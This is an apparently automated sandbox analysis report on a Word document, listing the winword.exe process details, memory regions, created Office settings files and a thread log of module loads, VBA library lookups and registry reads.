8ad2860416f81070b57d262e8dcb2894048f18c8989f9c24a870a1582c2129a2 (SHA256)
BZ_Media_Info.doc
Word Document
Created at 2018-03-29 15:42:00
Notifications (2/3)
The overall sleep time of all monitored processes was truncated from "23 seconds" to "10 seconds" to reveal dormant functionality.
Monitored Processes
Behavior Information - Sequential View
Process #1: winword.exe
516
0
| Information | Value |
|---|---|
| ID | #1 |
| File Name | c:\program files\microsoft office\root\office16\winword.exe |
| Command Line | "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" |
| Initial Working Directory | C:\Users\aETAdzjz\Desktop\ |
| Monitor | Start Time: 00:00:21, Reason: Analysis Target |
| Unmonitor | End Time: 00:02:33, Reason: Terminated by Timeout |
| Monitor Duration | 00:02:12 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x968 |
| Parent PID | 0x5a8 (c:\windows\explorer.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
A08
0x
9FC
0x
9F4
0x
9F0
0x
9E0
0x
9D8
0x
9D4
0x
9CC
0x
9C8
0x
9C4
0x
9C0
0x
9BC
0x
9B8
0x
9B4
0x
9B0
0x
9AC
0x
98C
0x
988
0x
984
0x
980
0x
97C
0x
96C
0x
A34
0x
A38
0x
A3C
0x
A44
0x
A48
0x
A4C
0x
A50
0x
A54
0x
A58
0x
A5C
0x
A60
0x
A64
0x
A68
0x
A8C
0x
B1C
0x
B20
0x
B44
0x
588
0x
9D0
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x00020fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00043fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| locale.nls | 0x00050000 | 0x000b6fff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x00000000000c0000 | 0x000c0000 | 0x000c0fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000000d0000 | 0x000d0000 | 0x000d0fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000000e0000 | 0x000e0000 | 0x000e0fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000000f0000 | 0x000f0000 | 0x000f6fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000100000 | 0x00100000 | 0x00101fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000110000 | 0x00110000 | 0x00110fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000120000 | 0x00120000 | 0x00120fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000130000 | 0x00130000 | 0x00131fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000000140000 | 0x00140000 | 0x0014ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000150000 | 0x00150000 | 0x0024ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000250000 | 0x00250000 | 0x0034ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000350000 | 0x00350000 | 0x0044ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000450000 | 0x00450000 | 0x005d7fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000000005e0000 | 0x005e0000 | 0x00760fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000770000 | 0x00770000 | 0x01b6ffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| sortdefault.nls | 0x01b70000 | 0x01e3efff | Memory Mapped File | Readable |
|
|
|
- |
| pagefile_0x0000000001e40000 | 0x01e40000 | 0x02232fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000002240000 | 0x02240000 | 0x02241fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000002250000 | 0x02250000 | 0x02252fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000002260000 | 0x02260000 | 0x02261fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000002270000 | 0x02270000 | 0x0236ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002370000 | 0x02370000 | 0x0237ffff | Private Memory | - |
|
|
|
- |
| pagefile_0x0000000002380000 | 0x02380000 | 0x02382fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000002390000 | 0x02390000 | 0x02392fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000000023a0000 | 0x023a0000 | 0x023a2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000000023b0000 | 0x023b0000 | 0x023b2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000000023c0000 | 0x023c0000 | 0x023c2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x00000000023d0000 | 0x023d0000 | 0x0240ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002410000 | 0x02410000 | 0x02417fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002420000 | 0x02420000 | 0x02420fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002430000 | 0x02430000 | 0x02430fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002440000 | 0x02440000 | 0x02440fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002450000 | 0x02450000 | 0x024cffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000024d0000 | 0x024d0000 | 0x024d0fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000024e0000 | 0x024e0000 | 0x02507fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002510000 | 0x02510000 | 0x02510fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000002520000 | 0x02520000 | 0x02520fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000002530000 | 0x02530000 | 0x0253ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002540000 | 0x02540000 | 0x0273ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000002740000 | 0x02740000 | 0x0281efff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000002820000 | 0x02820000 | 0x02824fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000002830000 | 0x02830000 | 0x02830fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002840000 | 0x02840000 | 0x0293ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000002940000 | 0x02940000 | 0x02941fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| index.dat | 0x02950000 | 0x0295bfff | Memory Mapped File | Readable, Writable |
|
|
|
- |
| index.dat | 0x02960000 | 0x02967fff | Memory Mapped File | Readable, Writable |
|
|
|
- |
| index.dat | 0x02970000 | 0x0297ffff | Memory Mapped File | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000002980000 | 0x02980000 | 0x02980fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000002990000 | 0x02990000 | 0x02990fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x00000000029a0000 | 0x029a0000 | 0x02a9ffff | Private Memory | Readable, Writable |
|
|
|
- |
| kernelbase.dll.mui | 0x02aa0000 | 0x02b5ffff | Memory Mapped File | Readable, Writable |
|
|
|
- |
| private_0x0000000002b60000 | 0x02b60000 | 0x02bcafff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002bd0000 | 0x02bd0000 | 0x02ccffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000002cd0000 | 0x02cd0000 | 0x02cd0fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000002ce0000 | 0x02ce0000 | 0x02ce0fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002cf0000 | 0x02cf0000 | 0x02cf0fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002d00000 | 0x02d00000 | 0x02dfffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000002e00000 | 0x02e00000 | 0x02e01fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| msxml6r.dll | 0x02e10000 | 0x02e10fff | Memory Mapped File | Readable |
|
|
|
- |
| {afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000017.db | 0x02e20000 | 0x02e3ffff | Memory Mapped File | Readable |
|
|
|
- |
| pagefile_0x0000000002e40000 | 0x02e40000 | 0x02e40fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002e80000 | 0x02e80000 | 0x02f7ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002fa0000 | 0x02fa0000 | 0x0301ffff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| segoeui.ttf | 0x03020000 | 0x0309efff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x00000000030c0000 | 0x030c0000 | 0x030cffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000030d0000 | 0x030d0000 | 0x0314ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000003190000 | 0x03190000 | 0x0328ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000003290000 | 0x03290000 | 0x0338ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000033b0000 | 0x033b0000 | 0x034affff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000034b0000 | 0x034b0000 | 0x038affff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000003950000 | 0x03950000 | 0x03a4ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000003ad0000 | 0x03ad0000 | 0x03bcffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000003bf0000 | 0x03bf0000 | 0x03bfffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000003c00000 | 0x03c00000 | 0x03c0ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000003c10000 | 0x03c10000 | 0x0400ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000004080000 | 0x04080000 | 0x0417ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000004200000 | 0x04200000 | 0x042fffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000004300000 | 0x04300000 | 0x043fffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000004400000 | 0x04400000 | 0x0440ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000004420000 | 0x04420000 | 0x0451ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000004550000 | 0x04550000 | 0x0464ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000004650000 | 0x04650000 | 0x04e4ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000004e50000 | 0x04e50000 | 0x05192fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x00000000051d0000 | 0x051d0000 | 0x0524ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000005250000 | 0x05250000 | 0x052cffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000005380000 | 0x05380000 | 0x0547ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000005480000 | 0x05480000 | 0x055b1fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000005690000 | 0x05690000 | 0x0578ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000005790000 | 0x05790000 | 0x0588ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000058c0000 | 0x058c0000 | 0x059bffff | Private Memory | Readable, Writable |
|
|
|
- |
| staticcache.dat | 0x059c0000 | 0x062effff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x0000000006320000 | 0x06320000 | 0x0641ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000006420000 | 0x06420000 | 0x0649ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000065f0000 | 0x065f0000 | 0x065fffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000066d0000 | 0x066d0000 | 0x067cffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000067e0000 | 0x067e0000 | 0x068dffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000068e0000 | 0x068e0000 | 0x070dffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000071c0000 | 0x071c0000 | 0x0723ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000007260000 | 0x07260000 | 0x0735ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000007360000 | 0x07360000 | 0x0835ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000008510000 | 0x08510000 | 0x0858ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000008590000 | 0x08590000 | 0x0898ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000036e00000 | 0x36e00000 | 0x36e0ffff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000036f30000 | 0x36f30000 | 0x36f3ffff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| osppc.dll | 0x748b0000 | 0x748e2fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernel32.dll | 0x76cd0000 | 0x76deefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| user32.dll | 0x76df0000 | 0x76ee9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x76ef0000 | 0x77098fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| psapi.dll | 0x770b0000 | 0x770b6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| normaliz.dll | 0x770c0000 | 0x770c2fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | Readable |
|
|
|
- |
| winword.exe | 0x13ff20000 | 0x1400fbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x000007febcee0000 | 0x7febcee0000 | 0x7febceeffff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| private_0x000007febe330000 | 0x7febe330000 | 0x7febe33ffff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| msptls.dll | 0x7fee4890000 | 0x7fee4a03fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| riched20.dll | 0x7fee4a10000 | 0x7fee4caafff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| adal.dll | 0x7fee4cb0000 | 0x7fee4dc9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| mscoreei.dll | 0x7fee4f00000 | 0x7fee4f98fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| mscoree.dll | 0x7fee4fa0000 | 0x7fee500efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| dwrite.dll | 0x7fee5010000 | 0x7fee518dfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| d3d10warp.dll | 0x7fee5190000 | 0x7fee535ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msointl.dll | 0x7fee5360000 | 0x7fee54fcfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wwintl.dll | 0x7fee5500000 | 0x7fee55bffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msores.dll | 0x7fee55c0000 | 0x7fee99a6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| mso99lres.dll | 0x7fee99b0000 | 0x7feea6a4fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| mso40uires.dll | 0x7feea6b0000 | 0x7feeaaecfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| d2d1.dll | 0x7feeaaf0000 | 0x7feeabd1fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| mso.dll | 0x7feeabe0000 | 0x7feec60bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| mso98win32client.dll | 0x7feec610000 | 0x7feed2b6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| mso50win32client.dll | 0x7feed2c0000 | 0x7feed34afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| mso40uiwin32client.dll | 0x7feed350000 | 0x7feede1efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| mso30win32client.dll | 0x7feede20000 | 0x7feee503fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| oart.dll | 0x7feee510000 | 0x7feef494fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wwlib.dll | 0x7feef4a0000 | 0x7fef1c78fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| mlang.dll | 0x7fef1c80000 | 0x7fef1cbafff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| mso20win32client.dll | 0x7fef1df0000 | 0x7fef2292fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcp140.dll | 0x7fef22a0000 | 0x7fef233bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| d3d11.dll | 0x7fef2340000 | 0x7fef2405fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rasman.dll | 0x7fef3920000 | 0x7fef393bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rasapi32.dll | 0x7fef3940000 | 0x7fef39a1fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| npmproxy.dll | 0x7fef4770000 | 0x7fef477bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| c2r64.dll | 0x7fef4cc0000 | 0x7fef4ea9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| appvisvsubsystems64.dll | 0x7fef4eb0000 | 0x7fef50e9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
|
For performance reasons, the remaining 461 entries are omitted.
The remaining entries can be found in flog.txt. |
||||||||
Created Files
| Filename | File Size | Hash Values | YARA Match | Actions |
|---|---|---|---|---|
| c:\users\aetadzjz\appdata\local\microsoft\office\16.0\floodgate\word.settings.json | 0.08 KB |
MD5:
e4e83f8123e9740b8aa3c3dfa77c1c04
SHA1: 5281eae96efde7b0e16a1d977f005f0d3bd7aad0 SHA256: 6034f27b0823b2a6a76fe296e851939fd05324d0af9d55f249c79af118b0eb31 |
|
|
| c:\users\aetadzjz\appdata\local\microsoft\office\16.0\floodgate\word.surveyhistorystats.json | 0.01 KB |
MD5:
6ca4960355e4951c72aa5f6364e459d5
SHA1: 2fd90b4ec32804dff7a41b6e63c8b0a40b592113 SHA256: 88301f0b7e96132a2699a8bce47d120855c7f0a37054540019e3204d6bcbaba3 |
|
|
| c:\users\aetadzjz\appdata\local\microsoft\office\16.0\floodgate\word.surveyeventactivitystats.json | 0.01 KB |
MD5:
6ca4960355e4951c72aa5f6364e459d5
SHA1: 2fd90b4ec32804dff7a41b6e63c8b0a40b592113 SHA256: 88301f0b7e96132a2699a8bce47d120855c7f0a37054540019e3204d6bcbaba3 |
|
|
| c:\users\aetadzjz\appdata\local\microsoft\office\otele\{7c776c18-8b8d-4fca-999c-a5a4280ba143} (0) - 2408 - winword.exe - otele.dat | 1.89 KB |
MD5:
6244ff86f2ab13fade4d6310f436e939
SHA1: f92feac710e9a968b5b6137fa812a2dd45600a65 SHA256: 14a9de9a6354d8a478947981e93a723a39d0383d925e9a2fb25c10c214ca725a |
|
|
Threads
Thread 0x96c
390
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| System | Get Time | type = System Time, time = 2018-03-29 15:42:36 (UTC) |
|
1 | |
| System | Get Time | type = Ticks, time = 97329 |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Module | Get Handle | module_name = c:\program files\microsoft office\root\office16\winword.exe, base_address = 0x13ff20000 |
|
1 | |
| Module | Load | module_name = Comctl32.dll, base_address = 0x7fefb970000 |
|
1 | |
| Module | Get Handle | module_name = MSI.DLL, base_address = 0x7fef9b60000 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = MsiProvideQualifiedComponentA, address_out = 0x7fef9be3b3c |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = MsiGetProductCodeA, address_out = 0x7fef9bda13c |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = MsiReinstallFeatureA, address_out = 0x7fef9be1618 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = MsiProvideComponentA, address_out = 0x7fef9bdf088 |
|
1 | |
| Module | Get Handle | module_name = C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBEUI.DLL, base_address = 0x0 |
|
1 | |
| Module | Load | module_name = C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBEUI.DLL, base_address = 0x7fee27f0000 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = MsoVBADigSigCallDlg, address_out = 0x7fee28f72c0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = MsoVbaInitSecurity, address_out = 0x7fee28660b0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = MsoFIEPolicyAndVersion, address_out = 0x7fee2811a60 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = MsoFAnsiCodePageSupportsLCID, address_out = 0x7fee2865f50 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = MsoFInitOffice, address_out = 0x7fee280f000 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = MsoUninitOffice, address_out = 0x7fee27fe860 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = MsoFGetFontSettings, address_out = 0x7fee27f3fc0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = MsoRgchToRgwch, address_out = 0x7fee2802380 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = MsoHrSimpleQueryInterface, address_out = 0x7fee27f7b80 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = MsoHrSimpleQueryInterface2, address_out = 0x7fee27f7b20 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = MsoFCreateControl, address_out = 0x7fee27f8730 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = MsoFLongLoad, address_out = 0x7fee2933260 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = MsoFLongSave, address_out = 0x7fee2933280 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = MsoFGetTooltips, address_out = 0x7fee2801f40 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = MsoFSetTooltips, address_out = 0x7fee2866370 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = MsoFLoadToolbarSet, address_out = 0x7fee2854590 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = MsoFCreateToolbarSet, address_out = 0x7fee27f55b0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = MsoHpalOffice, address_out = 0x7fee2800240 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = MsoFWndProcNeeded, address_out = 0x7fee27f3d10 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = MsoFWndProc, address_out = 0x7fee27f6d30 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = MsoFCreateITFCHwnd, address_out = 0x7fee27f3d40 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = MsoDestroyITFC, address_out = 0x7fee27fe6f0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = MsoFPitbsFromHwndAndMsg, address_out = 0x7fee27fdf40 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = MsoFGetComponentManager, address_out = 0x7fee27f7bf0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = MsoMultiByteToWideChar, address_out = 0x7fee27ffcd0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = MsoWideCharToMultiByte, address_out = 0x7fee27f8b20 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = MsoHrRegisterAll, address_out = 0x7fee28f2ef0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = MsoFSetComponentManager, address_out = 0x7fee28042c0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = MsoFCreateStdComponentManager, address_out = 0x7fee27f3e20 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = MsoFHandledMessageNeeded, address_out = 0x7fee27fab10 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = MsoPeekMessage, address_out = 0x7fee27fa7d0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = MsoFCreateIPref, address_out = 0x7fee27f1550 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = MsoDestroyIPref, address_out = 0x7fee27fe830 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = MsoChsFromLid, address_out = 0x7fee27f13d0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = MsoCpgFromChs, address_out = 0x7fee27f6660 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = MsoSetLocale, address_out = 0x7fee27f1500 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = MsoFSetHMsoinstOfSdm, address_out = 0x7fee27f3dd0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = MsoSetVbaInterfaces, address_out = 0x7fee28f71e0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = MsoGetControlInstanceId, address_out = 0x7fee28c6d10 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VbeuiFIsEdpEnabled, address_out = 0x7fee29398e0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = VbeuiEnterpriseProtect, address_out = 0x7fee2939830 |
|
1 | |
| Environment | Get Environment String | name = DDRYBUR |
|
1 | |
| Module | Get Filename | process_name = c:\program files\microsoft office\root\office16\winword.exe, file_name_orig = C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBE7.DLL, size = 260 |
|
1 | |
| Module | Load | module_name = C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\1033\VBE7INTL.DLL, base_address = 0x7fef5c80000 |
|
1 | |
| Module | Get Filename | process_name = c:\program files\microsoft office\root\office16\winword.exe, file_name_orig = C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBE7.DLL, size = 260 |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\Licenses |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CLASSES_ROOT\Licenses\8804558B-B773-11d1-BC3E-0000F87552E7, data = } |
|
1 | |
| Module | Load | module_name = OLEAUT32.DLL, base_address = 0x7fefe910000 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = SysFreeString, address_out = 0x7fefe911320 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = LoadTypeLib, address_out = 0x7fefe91f1e0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = RegisterTypeLib, address_out = 0x7fefe96caa0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = QueryPathOfRegTypeLib, address_out = 0x7fefe9a1760 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = UnRegisterTypeLib, address_out = 0x7fefe9a20d0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = OleTranslateColor, address_out = 0x7fefe93c760 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = OleCreateFontIndirect, address_out = 0x7fefe96ecd0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = OleCreatePictureIndirect, address_out = 0x7fefe96e840 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = OleLoadPicture, address_out = 0x7fefe97f420 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = OleCreatePropertyFrameIndirect, address_out = 0x7fefe974ec0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = OleCreatePropertyFrame, address_out = 0x7fefe979350 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = OleIconToCursor, address_out = 0x7fefe946e40 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = LoadTypeLibEx, address_out = 0x7fefe91a550 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = OleLoadPictureEx, address_out = 0x7fefe97f320 |
|
1 | |
| Window | Create | class_name = ThunderMain, wndproc_parameter = 0 |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Module | Get Handle | module_name = c:\windows\system32\user32.dll, base_address = 0x76df0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\user32.dll, function = GetSystemMetrics, address_out = 0x76e094f0 |
|
1 | |
